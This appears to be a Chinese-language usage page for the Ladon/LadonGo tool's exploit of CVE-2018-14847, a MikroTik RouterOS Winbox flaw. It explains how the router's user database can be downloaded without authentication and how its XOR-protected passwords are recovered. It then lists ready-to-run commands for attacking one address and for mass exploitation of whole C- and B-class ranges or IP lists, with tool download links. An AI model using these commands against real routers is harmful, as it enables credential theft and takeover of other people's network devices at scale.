漏洞介绍

相关的技术讨论作者在 21 May 2018 日就以文章的形式详细阐述 https://n0p.me/winbox-bug-dissection/ ，漏洞大致是这样的：

Winbox申请登录以后会从RouterOS里面下载一些适用于当前版本的ROS的DLL文件作为Winbox的功能模块来执行，但是这个下载行为没有恰当的鉴权，通过精心构造的请求包，可以下载任意文件，包括RouterOS的用户数据库文件。
RouterOS的用户数据库存储的密码没有使用标准的加密方式加密，只是把密码原文和 md5(用户名 + “283i4jfkai3389”) 做了一次XOR运算，运算结果完全可逆，几乎可以认为是明文存储了密码，使用LadonGo的CVE-2018-14847 EXP可以直接还原出明文密码，导致路由器沦陷。
影响范围 6.29 (release date: 2015/28/05) to 6.42 (release date 2018/04/20)

RouterOS下载

https://download2.mikrotik.com/routeros/6.38.4/mikrotik-6.38.4.iso

单IP利用

1
2
3

Ladon 192.168.1.50 CVE-2018-14847
Ladon CVE-2018-14847 192.168.1.50
Ladon CVE-2018-14847 192.168.1.50 8291

批量利用

1
2
3
4

Ladon 192.168.1.50/24 CVE-2018-14847 C段
Ladon 192.168.1.50/c CVE-2018-14847  C段
Ladon 192.168.1.50/b CVE-2018-14847  B段
Ladon ip.txt CVE-2018-14847          IP.TXT

Download

LadonGo (ALL OS)

https://github.com/k8gege/LadonGo/releases

Ladon (Windows & Cobalt Strike)

历史版本: https://github.com/k8gege/Ladon/releases
7.0版本：http://k8gege.org/Download
8.0版本：K8小密圈